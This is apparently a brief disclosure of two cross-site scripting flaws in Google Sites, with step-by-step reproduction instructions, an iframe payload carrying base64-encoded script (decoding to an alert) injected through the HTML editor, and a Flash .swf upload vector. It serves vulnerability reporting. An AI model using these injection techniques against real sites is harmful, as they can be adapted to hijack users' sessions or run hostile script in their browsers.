First XSS:
1) Go to: https://sites.google.com/
2) Create > Blank template > Site Name: > Create
3) Browse to the URL vulnerable: https://sites.google.com/site/isecauditorstest/ (example)
4) Edit > HTML > here insert the following payload: "><iframe src="data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4"></iframe>
5) To update
6) PoC: https://sites.google.com/site/isecauditorstest/
Second XSS:
1) Browse to URL vulnerable: https://sites.google.com/site/isecauditorstest/ (example)
2) Create Page
3) Assign a name to your site: > Select a template: File cabinet > Create
4) Add file > select our file * .swf > Copy the link to "See"
5) PoC: https://sites.google.com/site/isecauditorstest/test-xssed/isec_flashxss.swf?attredirects=0